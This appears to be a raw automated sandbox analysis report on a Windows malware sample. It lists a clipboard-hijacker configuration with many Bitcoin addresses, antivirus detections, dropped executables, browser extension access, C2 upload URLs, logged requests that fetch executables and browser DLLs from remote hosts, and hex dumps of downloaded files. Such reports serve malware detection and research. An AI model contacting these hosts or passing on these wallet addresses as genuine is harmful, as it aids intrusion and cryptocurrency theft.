Source: 22.2.SmartClock.exe.4ce0e50.1.raw.unpack	Malware Configuration Extractor: Clipboard Hijacker {"Crypto Addresses": [["1Cu7QmB2Kpm8VYu2Nh17k1PN8LL1pNNrgt", "17xPYSy7SKSEa7RyaYDoSRPH3HxKr6Cqe8", "15nSdjUdz6Ry4t23Mr3S6rhdYkanZMSRxW", "1LUmg5xwrEmNU7XL8kaJyqDrxJz9qwMqHX", "1BED4VEW7jdppa9pkF5SbTEaXxH1NUkhqS", "18Y73igktnEcoa6MFABh7wyBUR6QBex7J6", "1JoE41m15FAyasg4v4EikbutSnZQRPWJYB", "1EaXMV7r2V3CvKNJATwALWF44tnG86a7H8", "15vuHo5WJ3x7w14TL1Pg1QCpn7UvYv5kdy", "1MBAHLMJ1V46M2GJjHWpoyzkXpM1Gbn7Ex", "12aC4Y27NgJb8jGQM5nfcEtNH9C62Z333Z", "17qqPaND7SMEvbMH8aiCLK3HoLT8GHpcbD", "1DCbnbnViwgrCHQz5MSjDEywG57KQ2Yyz5", "1P4DZabG1DkoPLhjUexyeRRGFCxVZ7gbbA", "1PQEgnbXviZ3VTU45sv9AT3ijrtMsGVR4k", "1DKwh1wpVMPSWm9i5vVfDqQ1rcnwzUKvjY", "1CY17hqLVj3ScmVc9A59LQ1QtadAc4aKpd", "1JcynWYnov4cTL185W3uwhUPZcePkFozMv", "1DgwaMsEPPteC2tyS7tXiynR9NnDmrucfb", "1EjwUssm429Y2jqMgrcfA4hWNDjMLF1PBF", "129jRH6UxKphVufDv3cNFipHomPZGev5x8", "16RTAhnMkXmjR7Uow2TsgtuPYQATdUNsk9", "1KqwCG6o64VXFbEh6adS2BPwtCgUWsf9NR", "1KUXBgwHVdKE9zoKsjLjuvBHKm3iyjS79y", "17WRBt2bUSVTFG865zQPzPzLP961UnbNYa", "15HqT8GQYWjv9WpXmdoQQNpvaJSzj1QECm", "1J4AGYpvxQj3GAviBoeJt9sxMDtnMHAyZM", "114hVez9KHowSxDg8Um5VQ3j6kD4ir8vDV", "1PfjCZP2Jw4sypVK97LjcAaWh8RAmFLgHS", "1FE6eW4Lcq2VNGTo7nj1xxCrt1BjFbiX2q", "1PZYBqQrxno4jDH9g4hq6wfhRBxmF7zqun", "177ZrhwydtUEdQzqdGhSKXGuZksWXeoxZB", "1KtkcRi38B1nM1GtzrXWjkicTfAsFKcYMC", "15ZHv6MVH35Tt2yXAmEA3XNZ5pMtgF5tuh", "1JAFF3DmPVC5kNM9HPfZuupwEWXmuCBFao", "14zUtFbmkRJiK2TabUVLNYUptsBVzJA7xR", "1KL7cDPqRR3fxcC6oV2f7T3vKekgwmr7ho", "1BDhwffobf4kooikeX3DqTBqPxpKb8nzFu", "13pJsrBD6TQYScwz4PNSRHijyEYKNy6wbU", "1GM3MTjUWNCZqjAtcqdx5gjgHw4sZW7HZi", "14AiVb9VCPcRZDZWqoysrfp85n1uj9Hnc3", "199PQyc9ckqDSyF5i837GtyTrVnstEjMbm", "1HFFojX8MjyPzDVzdUJhpvQ8pDgiPPbVuA", "12f19PA3NQqTrSmsR7AcFhFhajh9A7iLky", "1JdoFFu3Z5EuPwXbHsE1zhfv16rUszG72J", "1PvgRw9iQc18LWLmCBwBxqHniYE7e2T9Ca", "1JeDbKhM1MQZ5pbMVAF5Ee227oFGYCtoD9", "1JUdjbhmSD7NhUTkYJL7pZRspjwRwMtj2Z", "18akoRv8baEM9kkJyvtBtpJFh5RLNS8uHu", "1B7wVnWAqXdq4X2fx6EYuNyxHTQYNhd2mX", "12pFiFwmbqbZgcdAxNGEThGf7zsD3kBrBN", "1CqY3fbiaLZGCWEoxuCfTVVLSQzMiT8gMg", "16G9UVTbbYmB85qCWTxtwdRBsdRk7fyJaa", "1Dn84nTH85geDu33bDsu5mNWdAtUXoQbmg", "1HwadsZoQgxw7x3uYqo4puVbCGafWHC4Jr", "114VdoGdnfKEt7mDdeBEaNtCzi95FtjUng", "1MFzE1tF7qdpLwa1iSyMeu2bRa64NJcz58", "169ViyhxXwFVQHF5zyQ8P99MCZ9UGtH5X1", "1JXeN9U7tvfspamUdke3HdvimM6kizvKj4", "19iTJrH4PiHXDJUePDGiqGaAscNTZXhwrd", "1HLENGgZtFC7eSPktbPnN2eCQyZtgYFwdC", "1BB7hKUq5quexhPYkGT5Ki9FDWexp8uCtm", "18Zc5nB8CrGoys5JeGCwEHChNp7Zs69kaC", "16NxzYwhRrohNKktnsGdoCwvCstNjYspUr", "1vaGRAuhwDTv2GWqogzkDTrriPQnNxKJZ", "13daSsKk2aVZMjeeTbFA9Ede3co6mpzAwZ", "1BU8CgZLvh7VM44PKbs3f8VvvkhxrkfYRW", "1CSb8wZquo6CpsKPLQAyGCwhbH2tRoAnpd", "1CaGBVQPdbmet7eApWMh8BAaHQo8crWo8T", "16bpyz87dfV1YoURqLM7MqS1hmmdNqZaLm", "1EqjcUcyyRYPnrMU7H7ZQxaW4M2sw1dhAv", "18p3TMVUS6J7sygFsCs3SacGJSsf7zPt83", "143WjQzA4kLwAT9AoAgjeb1WvtmzLcZiy2", "16UMVYS2VtTYhRYJ3BLcupQNVsg5zFEcX9", "17J85MWEoNzL7UUuLXZGzf7Rdft7MLopYz", "1HKZivmbaNfDPZrR4tUxjJ2tazkCnyui9", "1McBXPm1ZTiRCLaSftZUoiyUEUX1xJiygW", "1Dhij9Sz2aFMviCvfJwAvLBVsaGrb7LSL

Multi AV Scanner detection for submitted file

Source: AhB0i1fe7I.exe

Virustotal: Detection: 35%

Machine Learning detection for sample

Source: AhB0i1fe7I.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\jajvesg	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 27.3.A8D4.exe.bcd7a10.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 27.3.A8D4.exe.bdca378.9.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 27.3.A8D4.exe.bcc8a08.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 27.3.A8D4.exe.bcee218.7.unpack	Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Unpacked PE file: 19.2.45C4.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 22.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 23.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 26.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Unpacked PE file: 27.2.A8D4.exe.400000.0.unpack

Uses 32bit PE files

Source: AhB0i1fe7I.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.7:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.231.129.81:443 -> 192.168.2.7:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.7:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.7:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.90.100:443 -> 192.168.2.7:49866 version: TLS 1.2

Source:	Binary string: +9\a3C:\vuwesatubezin wozejoyo.pdb source: AhB0i1fe7I.exe
Source:	Binary string: C:\bicuh\zobadeyajikodo\kukotibolufunu\hadisat.pdb`I source: 45C4.exe, 00000013.00000000.391115493.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 00000016.00000000.409632573.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 00000017.00000000.410357794.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 0000001A.00000000.435229767.000000000048F000.00000002.00020000.sdmp, SmartClock.exe.19.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.27.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140[1].dll.27.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140[1].dll.27.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.27.dr
Source:	Binary string: C:\vuwesatubezin wozejoyo.pdb source: AhB0i1fe7I.exe
Source:	Binary string: C:\bicuh\zobadeyajikodo\kukotibolufunu\hadisat.pdb source: 45C4.exe, 00000013.00000000.391115493.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 00000016.00000000.409632573.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 00000017.00000000.410357794.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 0000001A.00000000.435229767.000000000048F000.00000002.00020000.sdmp, SmartClock.exe.19.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.27.dr

Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0040F64C FindFirstFileExW,	19_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040F64C FindFirstFileExW,	22_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0040F64C FindFirstFileExW,	23_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_0040F64C FindFirstFileExW,	26_2_0040F64C

Networking:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: bitbucket.org
Source: C:\Windows\explorer.exe	Domain query: bbuseruploads.s3.amazonaws.com
Source: C:\Windows\explorer.exe	Domain query: wedoepicsht.com
Source: C:\Windows\explorer.exe	Domain query: brandyjaggers.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://rapmusic.at/upload/
Source: Malware configuration extractor	URLs: http://100klv.com/upload/
Source: Malware configuration extractor	URLs: http://brandyjaggers.com/upload/
Source: Malware configuration extractor	URLs: http://andbal.com/upload/
Source: Malware configuration extractor	URLs: http://alotofquotes.com/upload/
Source: Malware configuration extractor	URLs: http://szpnc.cn/upload/
Source: Malware configuration extractor	URLs: http://uggeboots.com/upload/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /@lilocc HTTP/1.1Host: mas.to
Source: global traffic	HTTP traffic detected: GET /abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Connection: Keep-AliveHost: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /be841f15-ba7d-44ef-a2c3-578559359f2a/downloads/03816c1a-92b3-4594-a3f6-6b3bedcc9b58/Taxao.exe?Signature=X6OA%2BfswTdnTnpZhN%2FTguu6wjTI%3D&Expires=1635244566&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=5qays.Q7NMcKdIvyy3pF9kf3XJHnSkKZ&response-content-disposition=attachment%3B%20filename%3D%22Taxao.exe%22 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Connection: Keep-AliveHost: bbuseruploads.s3.amazonaws.com
Source: global traffic	HTTP traffic detected: POST /936 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 65.108.80.190Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 4900Host: 65.108.80.190Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: bitbucket.orgConnection: Keep-Alive

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 26 Oct 2021 10:18:25 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Wed, 27 Oct 2021 10:18:25 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 26 Oct 2021 10:18:26 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Wed, 27 Oct 2021 10:18:26 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 26 Oct 2021 10:18:26 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Wed, 27 Oct 2021 10:18:26 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 